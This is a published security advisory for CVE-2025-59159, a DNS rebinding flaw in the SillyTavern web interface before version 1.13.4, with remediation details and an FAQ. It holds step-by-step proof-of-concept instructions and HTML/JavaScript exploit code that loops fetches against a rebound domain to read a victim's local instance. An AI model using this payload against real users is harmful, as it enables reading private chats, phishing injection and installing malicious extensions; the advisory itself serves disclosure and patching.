CVE-2025-59159: SillyTavern Web Interface Vulnerable to DNS Rebinding

Published Oct 6, 2025
·
Updated

Summary The web UI for SillyTavern is susceptible to DNS rebinding, allowing attackers to perform actions like install malicious extensions, read chats, inject arbitrary HTML for phishing, etc.

Details DNS rebinding is a method to bypass the CORS policies by tricking the browser into resolving something like 127.0.0.1 for a site's DNS address. This allows anybody to get remote access to anyone's SillyTavern instance without it being exposed, just by visiting a website.

PoC 1. Host the PoC HTML file on a /rebind.html endpoint (or any other endpoint) on a web server on port 8000 2. Go to https://lock.cmpxchg8b.com/rebinder.html and input your IP address (A) to rebind to 127.0.0.1 (B) 3. Replace the URL in the HTML with the returned URL on the site 4. Go to http://[URL]:8000/rebind.html in firefox or on any mobile browser if you're using termux 5. Check the developer tools console. It should return all of the data

Here is the PoC code:

html <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>Rebind Payload</title> </head> <body> <script> async function tryRebind() { while (true) { try { let res = await fetch("http://[DOMAIN HERE]:8000/"); let text = await res.text();

if (text.includes("Directory listing for /")) { console.log("Still attacker server, retrying..."); await new Promise(r => setTimeout(r, 2000)); continue; // don't break yet }

console.log("GOT VICTIM RESPONSE!"); console.log(text.substring(0, 300)); break;

} catch (e) { console.log("Fetch failed, retrying...", e); await new Promise(r => setTimeout(r, 2000)); } } } tryRebind(); </script> </body> </html>

Impact Attackers can read user chats, inject HTML for stuff like phishing, download arbitrary malicious extensions, etc. Essentially gaining full control over users' SillyTavern systems.

Resolution A vulnerability has been patched in the version 1.13.4 by introducing a server configuration setting that enables a validation of host names in inbound HTTP requests according to the provided list of allowed hosts: hostWhitelist.enabled in config.yaml file or SILLYTAVERNHOSTWHITELISTENABLED environment variable.

While the setting is disabled by default to honor a wide variety of existing user configurations and maintain backwards compatibility, existing and new users are encouraged to review their server configurations and apply necessary changes to their setup, especially if hosting over the local network while not using SSL.

- Documentation - Security checklist

Resources - https://github.com/SillyTavern/SillyTavern/commit/d134abd50e4a416e3b81233242583b0a23f38320

Other sources

SillyTavern is a locally installed user interface that allows users to interact with text generation large language models, image generation engines, and text-to-speech voice models. In versions prior to 1.13.4, the web user interface for SillyTavern is susceptible to DNS rebinding, allowing attackers to perform actions like install malicious extensions, read chats, inject arbitrary HTML for phishing attacks, etc. The vulnerability has been patched in the version 1.13.4 by introducing a server configuration setting that enables a validation of host names in inbound HTTP requests according to the provided list of allowed hosts: hostWhitelist.enabled in config.yaml file or SILLYTAVERNHOSTWHITELISTENABLED environment variable. While the setting is disabled by default to honor a wide variety of existing user configurations and maintain backwards compatibility, existing and new users are encouraged to review their server configurations and apply necessary changes to their setup, especially if hosting over the local network while not using SSL.

— MITRE

Affected Software

1 affected componentFixes available
npm/sillytavern<1.13.4
1.13.4

Event History

Oct 6, 2025
CVE Published
via MITRE·03:31 PM
Data Sourced
via MITRE·03:31 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·04:15 PM
DescriptionSeverityWeakness
Advisory Published
via GitHub·08:18 PM
Data Sourced
via GitHub·08:18 PM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

What is the severity of CVE-2025-59159?

CVE-2025-59159 is classified as a medium-severity vulnerability due to its potential to exploit DNS rebinding attacks.

2

How do I fix CVE-2025-59159?

To remediate CVE-2025-59159, upgrade your SillyTavern Web Interface to version 1.13.4 or later.

3

Who is affected by CVE-2025-59159?

Users running SillyTavern Web Interface version prior to 1.13.4 are affected by CVE-2025-59159.

4

What type of vulnerability is CVE-2025-59159?

CVE-2025-59159 is a DNS rebinding vulnerability that affects the SillyTavern Web Interface.

5

What actions can be taken to mitigate CVE-2025-59159?

In addition to upgrading, users can implement network security controls to limit exposure to DNS rebinding threats.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203